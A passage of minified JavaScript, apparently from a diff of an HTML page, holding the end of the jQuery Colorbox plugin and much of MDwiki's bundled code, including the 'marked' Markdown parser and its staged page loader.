Date,K.fastIframe?l():a(h).one("load",l),h.src=K.href,K.scrolling||(h.scrolling="no"),a(h).addClass(f+"Iframe").appendTo(A).one(m,function(){h.src="//about:blank"})):l(),"fade"===K.transition?r.fadeTo(d,1,s):s()}},"fade"===K.transition?r.fadeTo(d,0,function(){W.position(0,c)}):W.position(d,c)}},W.load=function(b){var c,d,e=W.prep;T=!0,R=!1,P=y[Q],b||db(),eb(m),eb(i,K.onLoad),K.h=K.height?_(K.height,"y")-N-L:K.innerHeight&&_(K.innerHeight,"y"),K.w=K.width?_(K.width,"x")-O-M:K.innerWidth&&_(K.innerWidth,"x"),K.mw=K.w,K.mh=K.h,K.maxWidth&&(K.mw=_(K.maxWidth,"x")-O-M,K.mw=K.w&&K.w<K.mw?K.w:K.mw),K.maxHeight&&(K.mh=_(K.maxHeight,"y")-N-L,K.mh=K.h&&K.h<K.mh?K.h:K.mh),c=K.href,V=setTimeout(function(){C.show().appendTo(t)},100),K.inline?(Z(X).hide().insertBefore(a(c)[0]).one(m,function(){a(this).replaceWith(A.children())}),e(a(c))):K.iframe?e(" "):K.html?e(K.html):ab(c)?(a(R=new Image).addClass(f+"Photo").error(function(){K.title=!1,e(Z(X,"Error").html(K.imgError))}).load(function(){var a;R.onload=null,K.scalePhotos&&(d=function(){R.height-=R.height*a,R.width-=R.width*a},K.mw&&R.width>K.mw&&(a=(R.width-K.mw)/R.width,d()),K.mh&&R.height>K.mh&&(a=(R.height-K.mh)/R.height,d())),K.h&&(R.style.marginTop=Math.max(K.h-R.height,0)/2+"px"),y[1]&&(K.loop||y[Q+1])&&(R.style.cursor="pointer",R.onclick=function(){W.next()}),n&&(R.style.msInterpolationMode="bicubic"),setTimeout(function(){e(R)},1)}),setTimeout(function(){R.src=c},1)):c&&B.load(c,K.data,function(b,c){e("error"===c?Z(X,"Error").html(K.xhrError):a(this).contents())})},W.next=function(){!T&&y[1]&&(K.loop||y[Q+1])&&(Q=$(1),W.load())},W.prev=function(){!T&&y[1]&&(K.loop||Q)&&(Q=$(-1),W.load())},W.close=function(){S&&!U&&(U=!0,S=!1,eb(k,K.onCleanup),z.unbind("."+f+" ."+p),q.fadeTo(200,0),r.stop().fadeTo(300,0,function(){r.add(q).css({opacity:1,cursor:"auto"}).hide(),eb(m),A.remove(),setTimeout(function(){U=!1,eb(l,K.onClosed)},1)}))},W.remove=function(){a([]).add(r).add(q).remove(),r=null,a("."+g).removeData(e).removeClass(g).die()},W.element=function(){return a(P)},W.settings=d)})(jQuery,document,this);</script>
-<!-- END extlib/js/jquery.colorbox.min.js -->
-<!-- START dist/MDwiki.min.js -->
-<script type="text/javascript">function googlemapsReady(){googlemapsLoadDone.resolve()}(function(){function a(a){this.tokens=[],this.tokens.links={},this.options=a||h.defaults,this.rules=i.normal,this.options.gfm&&(this.rules=this.options.tables?i.tables:i.gfm)}function b(a,b){if(this.options=b||h.defaults,this.links=a,this.rules=j.normal,!this.links)throw new Error("Tokens array requires a `links` property.");this.options.gfm?this.rules=this.options.breaks?j.breaks:j.gfm:this.options.pedantic&&(this.rules=j.pedantic)}function c(a){this.tokens=[],this.token=null,this.options=a||h.defaults}function d(a,b){return a.replace(b?/&/g:/&(?!#?\w+;)/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#39;")}function e(a,b){return a=a.source,b=b||"",function c(d,e){return d?(e=e.source||e,e=e.replace(/(^|[^\[])\^/g,"$1"),a=a.replace(d,e),c):new RegExp(a,b)}}function f(){}function g(a){for(var b,c,d=1;d<arguments.length;d++){b=arguments[d];for(c in b)Object.prototype.hasOwnProperty.call(b,c)&&(a[c]=b[c])}return a}function h(b,e,f){if(f||"function"==typeof e){f||(f=e,e=null),e&&(e=g({},h.defaults,e));var i=a.lex(i,e),j=e.highlight,k=0,l=i.length,m=0;if(!j||j.length<3)return f(null,c.parse(i,e));for(var n=function(){delete e.highlight;var a=c.parse(i,e);return e.highlight=j,f(null,a)};l>m;m++)!function(a){return"code"===a.type?(k++,j(a.text,a.lang,function(b,c){return null==c||c===a.text?--k||n():(a.text=c,a.escaped=!0,void(--k||n()))})):void 0}(i[m])}else try{return e&&(e=g({},h.defaults,e)),c.parse(a.lex(b,e),e)}catch(o){if(o.message+="\nPlease report this to https://github.com/chjj/marked.",(e||h.defaults).silent)return"<p>An error occured:</p><pre>"+d(o.message+"",!0)+"</pre>";throw o}}var i={newline:/^\n+/,code:/^( {4}[^\n]+\n*)+/,fences:f,hr:/^( *[-*_]){3,} *(?:\n+|$)/,heading:/^ *(#{1,6}) *([^\n]+?) *#* *(?:\n+|$)/,nptable:f,lheading:/^([^\n]+)\n *(=|-){3,} *\n*/,blockquote:/^( *>[^\n]+(\n[^\n]+)*\n*)+/,list:/^( *)(bull) [\s\S]+?(?:hr|\n{2,}(?! )(?!\1bull )\n*|\s*$)/,html:/^ *(?:comment|closed|closing) *(?:\n{2,}|\s*$)/,def:/^ *\[([^\]]+)\]: *<?([^\s>]+)>?(?: +["(]([^\n]+)[")])? *(?:\n+|$)/,table:f,paragraph:/^((?:[^\n]+\n?(?!hr|heading|lheading|blockquote|tag|def))+)\n*/,text:/^[^\n]+/};i.bullet=/(?:[*+-]|\d+\.)/,i.item=/^( *)(bull) [^\n]*(?:\n(?!\1bull )[^\n]*)*/,i.item=e(i.item,"gm")(/bull/g,i.bullet)(),i.list=e(i.list)(/bull/g,i.bullet)("hr",/\n+(?=(?: *[-*_]){3,} *(?:\n+|$))/)(),i._tag="(?!(?:a|em|strong|small|s|cite|q|dfn|abbr|data|time|code|var|samp|kbd|sub|sup|i|b|u|mark|ruby|rt|rp|bdi|bdo|span|br|wbr|ins|del|img)\\b)\\w+(?!:/|@)\\b",i.html=e(i.html)("comment",/<!--[\s\S]*?-->/)("closed",/<(tag)[\s\S]+?<\/\1>/)("closing",/<tag(?:"[^"]*"|'[^']*'|[^'">])*?>/)(/tag/g,i._tag)(),i.paragraph=e(i.paragraph)("hr",i.hr)("heading",i.heading)("lheading",i.lheading)("blockquote",i.blockquote)("tag","<"+i._tag)("def",i.def)(),i.normal=g({},i),i.gfm=g({},i.normal,{fences:/^ *(`{3,}|~{3,}) *(\S+)? *\n([\s\S]+?)\s*\1 *(?:\n+|$)/,paragraph:/^/}),i.gfm.paragraph=e(i.paragraph)("(?!","(?!"+i.gfm.fences.source.replace("\\1","\\2")+"|")(),i.tables=g({},i.gfm,{nptable:/^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*/,table:/^ *\|(.+)\n *\|( *[-:]+[-| :]*)\n((?: *\|.*(?:\n|$))*)\n*/}),a.rules=i,a.lex=function(b,c){var d=new a(c);return d.lex(b)},a.prototype.lex=function(a){return a=a.replace(/\r\n|\r/g,"\n").replace(/\t/g,"    ").replace(/\u00a0/g," ").replace(/\u2424/g,"\n"),this.token(a,!0)},a.prototype.token=function(a,b){for(var c,d,e,f,g,h,j,k,l,a=a.replace(/^ +$/gm,"");a;)if((e=this.rules.newline.exec(a))&&(a=a.substring(e[0].length),e[0].length>1&&this.tokens.push({type:"space"})),e=this.rules.code.exec(a))a=a.substring(e[0].length),e=e[0].replace(/^ {4}/gm,""),this.tokens.push({type:"code",text:this.options.pedantic?e:e.replace(/\n+$/,"")});else if(e=this.rules.fences.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"code",lang:e[2],text:e[3]});else if(e=this.rules.heading.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"heading",depth:e[1].length,text:e[2]});else if(b&&(e=this.rules.nptable.exec(a))){for(a=a.substring(e[0].length),h={type:"table",header:e[1].replace(/^ *| *\| *$/g,"").split(/ *\| */),align:e[2].replace(/^ *|\| *$/g,"").split(/ *\| */),cells:e[3].replace(/\n$/,"").split("\n")},k=0;k<h.align.length;k++)h.align[k]=/^ *-+: *$/.test(h.align[k])?"right":/^ *:-+: *$/.test(h.align[k])?"center":/^ *:-+ *$/.test(h.align[k])?"left":null;for(k=0;k<h.cells.length;k++)h.cells[k]=h.cells[k].split(/ *\| */);this.tokens.push(h)}else if(e=this.rules.lheading.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"heading",depth:"="===e[2]?1:2,text:e[1]});else if(e=this.rules.hr.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"hr"});else if(e=this.rules.blockquote.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"blockquote_start"}),e=e[0].replace(/^ *> ?/gm,""),this.token(e,b),this.tokens.push({type:"blockquote_end"});else if(e=this.rules.list.exec(a)){for(a=a.substring(e[0].length),f=e[2],this.tokens.push({type:"list_start",ordered:f.length>1}),e=e[0].match(this.rules.item),c=!1,l=e.length,k=0;l>k;k++)h=e[k],j=h.length,h=h.replace(/^ *([*+-]|\d+\.) +/,""),~h.indexOf("\n ")&&(j-=h.length,h=this.options.pedantic?h.replace(/^ {1,4}/gm,""):h.replace(new RegExp("^ {1,"+j+"}","gm"),"")),this.options.smartLists&&k!==l-1&&(g=i.bullet.exec(e[k+1])[0],f===g||f.length>1&&g.length>1||(a=e.slice(k+1).join("\n")+a,k=l-1)),d=c||/\n\n(?!\s*$)/.test(h),k!==l-1&&(c="\n"===h[h.length-1],d||(d=c)),this.tokens.push({type:d?"loose_item_start":"list_item_start"}),this.token(h,!1),this.tokens.push({type:"list_item_end"});this.tokens.push({type:"list_end"})}else if(e=this.rules.html.exec(a))a=a.substring(e[0].length),this.tokens.push({type:this.options.sanitize?"paragraph":"html",pre:"pre"===e[1]||"script"===e[1],text:e[0]});else if(b&&(e=this.rules.def.exec(a)))a=a.substring(e[0].length),this.tokens.links[e[1].toLowerCase()]={href:e[2],title:e[3]};else if(b&&(e=this.rules.table.exec(a))){for(a=a.substring(e[0].length),h={type:"table",header:e[1].replace(/^ *| *\| *$/g,"").split(/ *\| */),align:e[2].replace(/^ *|\| *$/g,"").split(/ *\| */),cells:e[3].replace(/(?: *\| *)?\n$/,"").split("\n")},k=0;k<h.align.length;k++)h.align[k]=/^ *-+: *$/.test(h.align[k])?"right":/^ *:-+: *$/.test(h.align[k])?"center":/^ *:-+ *$/.test(h.align[k])?"left":null;for(k=0;k<h.cells.length;k++)h.cells[k]=h.cells[k].replace(/^ *\| *| *\| *$/g,"").split(/ *\| */);this.tokens.push(h)}else if(b&&(e=this.rules.paragraph.exec(a)))a=a.substring(e[0].length),this.tokens.push({type:"paragraph",text:"\n"===e[1][e[1].length-1]?e[1].slice(0,-1):e[1]});else if(e=this.rules.text.exec(a))a=a.substring(e[0].length),this.tokens.push({type:"text",text:e[0]});else if(a)throw new Error("Infinite loop on byte: "+a.charCodeAt(0));return this.tokens};var j={escape:/^\\([\\`*{}\[\]()#+\-.!_>])/,autolink:/^<([^ >]+(@|:\/)[^ >]+)>/,url:f,tag:/^<!--[\s\S]*?-->|^<\/?\w+(?:"[^"]*"|'[^']*'|[^'">])*?>/,link:/^!?\[(inside)\]\(href\)/,reflink:/^!?\[(inside)\]\s*\[([^\]]*)\]/,nolink:/^!?\[((?:\[[^\]]*\]|[^\[\]])*)\]/,strong:/^__([\s\S]+?)__(?!_)|^\*\*([\s\S]+?)\*\*(?!\*)/,em:/^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)/,code:/^(`+)\s*([\s\S]*?[^`])\s*\1(?!`)/,br:/^ {2,}\n(?!\s*$)/,del:f,text:/^[\s\S]+?(?=[\\<!\[_*`]| {2,}\n|$)/};j._inside=/(?:\[[^\]]*\]|[^\]]|\](?=[^\[]*\]))*/,j._href=/\s*<?(.*?)>?(?:\s+['"]([\s\S]*?)['"])?\s*/,j.link=e(j.link)("inside",j._inside)("href",j._href)(),j.reflink=e(j.reflink)("inside",j._inside)(),j.normal=g({},j),j.pedantic=g({},j.normal,{strong:/^__(?=\S)([\s\S]*?\S)__(?!_)|^\*\*(?=\S)([\s\S]*?\S)\*\*(?!\*)/,em:/^_(?=\S)([\s\S]*?\S)_(?!_)|^\*(?=\S)([\s\S]*?\S)\*(?!\*)/}),j.gfm=g({},j.normal,{escape:e(j.escape)("])","~|])")(),url:/^(https?:\/\/[^\s<]+[^<.,:;"')\]\s])/,del:/^~~(?=\S)([\s\S]*?\S)~~/,text:e(j.text)("]|","~]|")("|","|https?://|")()}),j.breaks=g({},j.gfm,{br:e(j.br)("{2,}","*")(),text:e(j.gfm.text)("{2,}","*")()}),b.rules=j,b.output=function(a,c,d){var e=new b(c,d);return e.output(a)},b.prototype.output=function(a){for(var b,c,e,f,g="";a;)if(f=this.rules.escape.exec(a))a=a.substring(f[0].length),g+=f[1];else if(f=this.rules.autolink.exec(a))a=a.substring(f[0].length),"@"===f[2]?(c=this.mangle(":"===f[1][6]?f[1].substring(7):f[1]),e=this.mangle("mailto:")+c):(c=d(f[1]),e=c),g+='<a href="'+e+'">'+c+"</a>";else if(f=this.rules.url.exec(a))a=a.substring(f[0].length),c=d(f[1]),e=c,g+='<a href="'+e+'">'+c+"</a>";else if(f=this.rules.tag.exec(a))a=a.substring(f[0].length),g+=this.options.sanitize?d(f[0]):f[0];else if(f=this.rules.link.exec(a))a=a.substring(f[0].length),g+=this.outputLink(f,{href:f[2],title:f[3]});else if((f=this.rules.reflink.exec(a))||(f=this.rules.nolink.exec(a))){if(a=a.substring(f[0].length),b=(f[2]||f[1]).replace(/\s+/g," "),b=this.links[b.toLowerCase()],!b||!b.href){g+=f[0][0],a=f[0].substring(1)+a;continue}g+=this.outputLink(f,b)}else if(f=this.rules.strong.exec(a))a=a.substring(f[0].length),g+="<strong>"+this.output(f[2]||f[1])+"</strong>";else if(f=this.rules.em.exec(a))a=a.substring(f[0].length),g+="<em>"+this.output(f[2]||f[1])+"</em>";else if(f=this.rules.code.exec(a))a=a.substring(f[0].length),g+="<code>"+d(f[2],!0)+"</code>";else if(f=this.rules.br.exec(a))a=a.substring(f[0].length),g+="<br>";else if(f=this.rules.del.exec(a))a=a.substring(f[0].length),g+="<del>"+this.output(f[1])+"</del>";else if(f=this.rules.text.exec(a))a=a.substring(f[0].length),g+=d(f[0]);else if(a)throw new Error("Infinite loop on byte: "+a.charCodeAt(0));return g},b.prototype.outputLink=function(a,b){return"!"!==a[0][0]?'<a href="'+d(b.href)+'"'+(b.title?' title="'+d(b.title)+'"':"")+">"+this.output(a[1])+"</a>":'<img src="'+d(b.href)+'" alt="'+d(a[1])+'"'+(b.title?' title="'+d(b.title)+'"':"")+">"},b.prototype.smartypants=function(a){return this.options.smartypants?a.replace(/--/g,"—").replace(/'([^']*)'/g,"‘$1’").replace(/"([^"]*)"/g,"“$1”").replace(/\.{3}/g,"…"):a},b.prototype.mangle=function(a){for(var b,c="",d=a.length,e=0;d>e;e++)b=a.charCodeAt(e),Math.random()>.5&&(b="x"+b.toString(16)),c+="&#"+b+";";return c},c.parse=function(a,b){var d=new c(b);return d.parse(a)},c.prototype.parse=function(a){this.inline=new b(a.links,this.options),this.tokens=a.reverse();for(var c="";this.next();)c+=this.tok();return c},c.prototype.next=function(){return this.token=this.tokens.pop()},c.prototype.peek=function(){return this.tokens[this.tokens.length-1]||0},c.prototype.parseText=function(){for(var a=this.token.text;"text"===this.peek().type;)a+="\n"+this.next().text;return this.inline.output(a)},c.prototype.tok=function(){switch(this.token.type){case"space":return"";case"hr":return"<hr>\n";case"heading":return"<h"+this.token.depth+">"+this.inline.output(this.token.text)+"</h"+this.token.depth+">\n";case"code":if(this.options.highlight){var a=this.options.highlight(this.token.text,this.token.lang);null!=a&&a!==this.token.text&&(this.token.escaped=!0,this.token.text=a)}return this.token.escaped||(this.token.text=d(this.token.text,!0)),"<pre><code"+(this.token.lang?' class="'+this.options.langPrefix+this.token.lang+'"':"")+">"+this.token.text+"</code></pre>\n";case"table":var b,c,e,f,g,h="";for(h+="<thead>\n<tr>\n",c=0;c<this.token.header.length;c++)b=this.inline.output(this.token.header[c]),h+=this.token.align[c]?'<th align="'+this.token.align[c]+'">'+b+"</th>\n":"<th>"+b+"</th>\n";for(h+="</tr>\n</thead>\n",h+="<tbody>\n",c=0;c<this.token.cells.length;c++){for(e=this.token.cells[c],h+="<tr>\n",g=0;g<e.length;g++)f=this.inline.output(e[g]),h+=this.token.align[g]?'<td align="'+this.token.align[g]+'">'+f+"</td>\n":"<td>"+f+"</td>\n";h+="</tr>\n"}return h+="</tbody>\n","<table>\n"+h+"</table>\n";case"blockquote_start":for(var h="";"blockquote_end"!==this.next().type;)h+=this.tok();return"<blockquote>\n"+h+"</blockquote>\n";case"list_start":for(var i=this.token.ordered?"ol":"ul",h="";"list_end"!==this.next().type;)h+=this.tok();return"<"+i+">\n"+h+"</"+i+">\n";case"list_item_start":for(var h="";"list_item_end"!==this.next().type;)h+="text"===this.token.type?this.parseText():this.tok();return"<li>"+h+"</li>\n";case"loose_item_start":for(var h="";"list_item_end"!==this.next().type;)h+=this.tok();return"<li>"+h+"</li>\n";case"html":return this.token.pre||this.options.pedantic?this.token.text:this.inline.output(this.token.text);case"paragraph":return"<p>"+this.inline.output(this.token.text)+"</p>\n";case"text":return"<p>"+this.parseText()+"</p>\n"}},f.exec=f,h.options=h.setOptions=function(a){return g(h.defaults,a),h},h.defaults={gfm:!0,tables:!0,breaks:!1,pedantic:!1,sanitize:!1,smartLists:!1,silent:!1,highlight:null,langPrefix:"lang-"},h.Parser=c,h.parser=c.parse,h.Lexer=a,h.lexer=a.lex,h.InlineLexer=b,h.inlineLexer=b.output,h.parse=h,"object"==typeof exports?module.exports=h:"function"==typeof define&&define.amd?define(function(){return h}):this.marked=h}).call(function(){return this||("undefined"!=typeof window?window:global)}()),function(a){"use strict";a("html").addClass("md-hidden-load"),a.md=function(b){return a.md.publicMethods[b]?a.md.publicMethods[b].apply(this,Array.prototype.slice.call(arguments,1)):void a.error("Method "+b+" does not exist on jquery.md")},a.md.config={title:null,useSideMenu:!0,lineBreaks:"gfm",additionalFooterText:"",anchorCharacter:"&para;",tocAnchor:"[ &uarr; ]"},a.md.gimmicks=[],a.md.stages=[],a.md.mainHref="",a.md.inPageAnchor="",a.md.loglevel={TRACE:10,DEBUG:20,INFO:30,WARN:40,ERROR:50,FATAL:60},a.md.logThreshold=a.md.loglevel.WARN}(jQuery),function(a){"use strict";a.md.getLogger=function(){var b=a.md.loglevel,c=function(c){var d=b[c];return function(b){a.md.logThreshold<=d&&console.log("["+c+"] "+b)}},d={};return d.trace=c("TRACE"),d.debug=c("DEBUG"),d.info=c("INFO"),d.warn=c("WARN"),d.error=c("ERROR"),d.fatal=c("FATAL"),d}}(jQuery),function(a){"use strict";var b=a.md.getLogger();a.Stage=function(c){var d=a.extend(a.Deferred(),{});return d.name=c,d.events=[],d.started=!1,d.reset=function(){d.complete=a.Deferred(),d.outstanding=[]},d.reset(),d.subscribe=function(b){d.started&&a.error("Subscribing to stage which already started!"),d.events.push(b)},d.unsubscribe=function(a){d.events.remove(a)},d.executeSubscribedFn=function(e){var f=a.Deferred();d.outstanding.push(f),a.md.util.wait(2500).done(function(){"resolved"!==f.state()&&(b.fatal("Timeout reached for done callback in stage: "+d.name+". Did you forget a done() call in a .subscribe() ?"),b.fatal("stage "+c+" failed running subscribed function: "+e))});var g=function(){f.resolve()};e(g)},d.run=function(){d.started=!0,a(d.events).each(function(a,b){d.executeSubscribedFn(b)}),0===d.outstanding.length&&d.resolve(),a.when.apply(a,d.outstanding).done(function(){d.resolve()}).fail(function(){d.resolve()})},d.done(function(){b.debug("stage "+d.name+" completed successfully.")}),d.fail(function(){b.debug("stage "+d.name+" completed with errors!")}),d}}(jQuery),function(a){"use strict";function b(){a.md.stages=[a.Stage("init"),a.Stage("load"),a.Stage("transform"),a.Stage("ready"),a.Stage("skel_ready"),a.Stage("bootstrap"),a.Stage("pregimmick"),a.Stage("gimmick"),a.Stage("postgimmick"),a.Stage("all_ready"),a.Stage("final_tests")],a.md.stage=function(b){var c=a.grep(a.md.stages,function(a){return a.name===b});return 0!==c.length?c[0]:void a.error("A stage by name "+b+"  does not exist")}}function c(){var b=a.md.stages;a.md.stages=[],a(b).each(function(b,c){a.md.stages.push(a.Stage(c.name))})}function d(b){var c={gfm:!0,tables:!0,breaks:!0};"original"===a.md.config.lineBreaks?c.breaks=!1:"gfm"===a.md.config.lineBreaks&&(c.breaks=!0),marked.setOptions(c);var d=marked(b);return d}function e(){var b="";a.md.stage("init").subscribe(function(c){var d={url:a.md.mainHref,dataType:"text"};a.ajax(d).done(function(a){b=a,c()}).fail(function(){var b=a.md.getLogger();b.fatal("Could not get "+a.md.mainHref),c()})}),a.md.stage("transform").subscribe(function(b){var c=a.md.mainHref.lastIndexOf("/"),d=a.md.mainHref.substring(0,c+1);a.md.baseUrl=d,b()}),a.md.stage("transform").subscribe(function(c){var e=d(b);a("#md-content").html(e),b="";var g=a.Deferred();f(g),g.always(function(){c()})})}function f(b){function c(){return a("a").filter(function(){var b=a(this).attr("href"),c=a(this).toptext(),d=a.md.util.hasMarkdownFileExtension(b),e="include"===c,f=c.startsWith("preview:");return(e||f)&&d})}function e(b,c){function d(a){return 3===a.nodeType}var e=0,f=[];return b.each(function(a,b){c>e&&(f.push(b),d(b)||e++)}),a(f)}var f=c(),g=a.md.util.countDownLatch(f.length);g.always(function(){b.resolve()}),f.each(function(b,c){var f=a(c),h=f.attr("href"),i=f.toptext();a.ajax({url:h,dataType:"text"}).done(function(b){var c=a(d(b));if(i.startsWith("preview:")){var g=parseInt(i.substring(8),10)||3,j=e(c,g);j.last().append('<a href="'+h+'"> ...read more &#10140;</a>'),j.insertBefore(f.parent("p").eq(0)),f.remove()}else c.insertAfter(f.parents("p")),f.remove()}).always(function(){g.countDown()})})}function g(a){return a?a.lastIndexOf("data:")>=0?!0:a.startsWith("mailto:")?!0:a.startsWith("file:")?!0:a.startsWith("ftp:")?!0:void 0:!1}function h(b,c){var d=a(b);void 0===c&&(c=""),d.find("a").not("#md-menu a").filter(function(){var b=a(this),c=b.attr("href");c&&0!==c.length||b.removeAttr("href")}),d.find("a, img").each(function(b,d){function e(b){return a.md.util.hasMarkdownFileExtension(b)?"#!"+b:b}var f=a(d),h=!1,i="href";f.attr(i)||(h=!0,i="src");var j=f.attr(i);if(!(j&&j.lastIndexOf("#!")>=0||g(j)||(h||!j.startsWith("#")||j.startsWith("#!")||f.click(function(b){b.preventDefault(),a.md.scrollToInPageAnchor(j)}),!a.md.util.isRelativeUrl(j)||h&&!a.md.util.isRelativePath(j)||!h&&a.md.util.isGimmickLink(f)))){var k=c+j;h?f.attr(i,k):a.md.util.isRelativePath(j)?f.attr(i,e(k)):f.attr(i,e(j))}})}function i(){a.md.stage("init").subscribe(function(b){a.md.NavigationDfd.done(function(){b()}).fail(function(){b()})}),a.md.stage("transform").subscribe(function(b){if(""===r){var c=a.md.getLogger();return c.info("no navgiation.md found, not using a navbar"),void b()}var d=marked(r),e=a("<div>"+d+"</div>");e.each(function(b,c){"SCRIPT"===c.tagName&&a("script").first().before(c)});var f=e.eq(0);f.find("p").each(function(b,c){var d=a(c);d.replaceWith(d.html())}),a("#md-menu").append(f.html()),b()}),a.md.stage("bootstrap").subscribe(function(b){h(a("#md-menu")),b()}),a.md.stage("postgimmick").subscribe(function(b){var c=a("#md-menu a").length,d=a("#md-menu .navbar-brand").eq(0).toptext().trim().length>0;!d&&1>=c&&a("#md-menu").hide(),b()})}function j(){a.md.stage("init").subscribe(function(b){a.md.ConfigDfd.done(function(){b()}).fail(function(){var c=a.md.getLogger();c.info("No config.json found, using default settings"),b()})})}function k(){a.md.stage("init").subscribe(function(b){a("#md-all").empty();var c='<div id="md-body"><div id="md-title"></div><div id="md-menu"></div><div id="md-content"></div></div>';a("#md-all").prepend(a(c)),b()})}function l(b){a.md.mainHref=b,e(),k(),a.md.stage("ready").subscribe(function(b){a.md.initializeGimmicks(),a.md.registerLinkGimmicks(),b()}),a.each(a.md.gimmicks,function(b,c){void 0!==c.load&&a.md.stage("load").subscribe(function(a){c.load(),a()})}),a.md.stage("ready").subscribe(function(b){a.md("createBasicSkeleton"),b()}),a.md.stage("bootstrap").subscribe(function(b){a.mdbootstrap("bootstrapify"),h(a("#md-content"),a.md.baseUrl),b()}),m()}function m(){a.md.stage("init").done(function(){a.md.stage("load").run()}),a.md.stage("load").done(function(){a.md.stage("transform").run()}),a.md.stage("transform").done(function(){a.md.stage("ready").run()}),a.md.stage("ready").done(function(){a.md.stage("skel_ready").run()}),a.md.stage("skel_ready").done(function(){a.md.stage("bootstrap").run()}),a.md.stage("bootstrap").done(function(){a.md.stage("pregimmick").run()}),a.md.stage("pregimmick").done(function(){a.md.stage("gimmick").run()}),a.md.stage("gimmick").done(function(){a.md.stage("postgimmick").run()}),a.md.stage("postgimmick").done(function(){a.md.stage("all_ready").run()}),a.md.stage("all_ready").done(function(){a("html").removeClass("md-hidden-load"),"function"==typeof window.callPhantom&&window.callPhantom({}),a.md.stage("final_tests").run()}),a.md.stage("final_tests").done(function(){c(),a("body").append('<span id="start-tests"></span>'),a("#start-tests").hide()}),a.md.stage("init").run()}function n(){var b;b=window.location.hash.substring(window.location.hash.startsWith("#!")?2:1),b=decodeURIComponent(b);var c=b.indexOf("#");-1!==c?(a.md.inPageAnchor=b.substring(c+1),a.md.mainHref=b.substring(0,c)):a.md.mainHref=b}function o(){var a="",b=window.location.hash||"";""===b||"#"===b||"#!"===b?a="#!index.md":b.startsWith("#!")&&b.endsWith("/")&&(a=b+"index.md"),a&&(window.location.hash=a)}var p=a.md.getLogger();b();var q={};a.md.publicMethods=a.extend({},a.md.publicMethods,q);var r="";a.md.NavigationDfd=a.Deferred();var s={url:"navigation.md",dataType:"text"};a.ajax(s).done(function(b){r=b,a.md.NavigationDfd.resolve()}).fail(function(){a.md.NavigationDfd.reject()}),a.md.ConfigDfd=a.Deferred(),a.ajax({url:"config.json",dataType:"text"}).done(function(b){try{var c=JSON.parse(b);a.md.config=a.extend(a.md.config,c),p.info("Found a valid config.json file, using configuration")}catch(d){p.error("config.json was not JSON parsable: "+d)}a.md.ConfigDfd.resolve()}).fail(function(b,c){p.error("unable to retrieve config.json: "+c),a.md.ConfigDfd.reject()}),a(document).ready(function(){j(),i(),n(),o(),a(window).bind("hashchange",function(){window.location.reload(!1)}),l(a.md.mainHref)})}(jQuery),function(a){var b={isRelativeUrl:function(a){return void 0===a?!1:-1===a.indexOf("://")?!0:!1},isRelativePath:function(a){return void 0===a?!1:a.startsWith("/")?!1:!0},isGimmickLink:function(a){return-1!==a.toptext().indexOf("gimmick:")?!0:!1},hasMarkdownFileExtension:function(b){var c=[".md",".markdown",".mdown"],d=!1,e=b.toLowerCase().split("#")[0];return a(c).each(function(a,b){e.toLowerCase().endsWith(b)&&(d=!0)}),d},wait:function(b){return a.Deferred(function(a){setTimeout(a.resolve,b)})}};a.md.util=a.extend({},a.md.util,b),"function"!=typeof String.prototype.startsWith&&(String.prototype.startsWith=function(a){return this.slice(0,a.length)===a}),"function"!=typeof String.prototype.endsWith&&(String.prototype.endsWith=function(a){return this.slice(this.length-a.length,this.length)===a}),a.fn.extend({toptext:function(){return this.clone().children().remove().end().text()}}),a.expr[":"].icontains=a.expr.createPseudo(function(b){return function(c){return a(c).toptext().toUpperCase().indexOf(b.toUpperCase())>=0}}),a.md.util.getInpageAnchorText=function(a){var b=a.replace(/ /g,"_");return b},a.md.util.getInpageAnchorHref=function(b,c){c=c||a.md.mainHref;var d=a.md.util.getInpageAnchorText(b);return"#!"+c+"#"+d},a.md.util.repeatUntil=function(b,c,d){function e(b,c,d){return 0===d?void f.reject():c()?void f.resolve():void a.md.util.wait(b).always(function(){e(b,c,d-1)})}d=d||10;var f=a.Deferred();return e(b,c,d),f},a.md.util.countDownLatch=function(b,c){c=c||0;var d=a.Deferred();return c>=b&&d.resolve(),d.capacity=b,d.countDown=function(){d.capacity--,d.capacity<=c&&d.resolve()},d}}(jQuery),function($){"use strict";function ScriptInfo(a){this.module=void 0,this.options={},this.src="",$.extend(this,a)}function LinkTrigger(a){this.trigger=void 0,this.module=void 0,this.callback=void 0,$.extend(this,a)}function insertInlineScript(a){var b=document.createElement("script");b.type="text/javascript",b.text=a,document.body.appendChild(b)}function checkLicense(a,b){if(-1===$.inArray(a,licenses)){var c=JSON.stringify(licenses);log.warn("license "+a+" is not known."),log.warn("Known licenses:"+c)}else"OTHER"===a&&log.warn("WARNING: Module "+b.name+" uses a script with unknown license. This may be a GPL license violation if this website is publically available!")}function loadScript(a){var b=a.module,c=a.src,d=a.options,e=d.license||"OTHER",f=d.loadstage||"skel_ready",g=d.finishstage||"pregimmick",h=d.callback,i=$.Deferred();checkLicense(e,b),log.debug("subscribing "+b.name+" to start: "+f+" end in: "+g),$.md.stage(f).subscribe(function(a){c.startsWith("//")||c.startsWith("http")?$.getScript(c,function(){void 0!==h?h(a):(log.debug("module"+b.name+" script load done: "+c),a()),i.resolve()}):(insertInlineScript(c),log.debug("module"+b.name+" script inject done"),i.resolve(),a())}),$.md.stage(g).subscribe(function(a){i.done(function(){a()})})}function findActiveLinkTrigger(){var a=$("a:icontains(gimmick:)");a.each(function(a,b){var c=getGimmickLinkParts($(b));-1===activeLinkTriggers.indexOf(c.trigger)&&activeLinkTriggers.push(c.trigger)}),log.debug("Scanning for required gimmick links: "+JSON.stringify(activeLinkTriggers))}function loadRequiredScripts(){$.each(activeLinkTriggers,function(a,b){var c=findModuleByTrigger(b);if(void 0===c)return void log.error('Gimmick link: "'+b+'" found but no suitable gimmick loaded');var d=registeredScripts.filter(function(a){return a.module.name===c.name})[0];void 0!==d&&loadScript(d)})}function findModuleByTrigger(a){var b;return $.each(linkTriggers,function(c,d){d.trigger===a&&(b=d.module)}),b}function 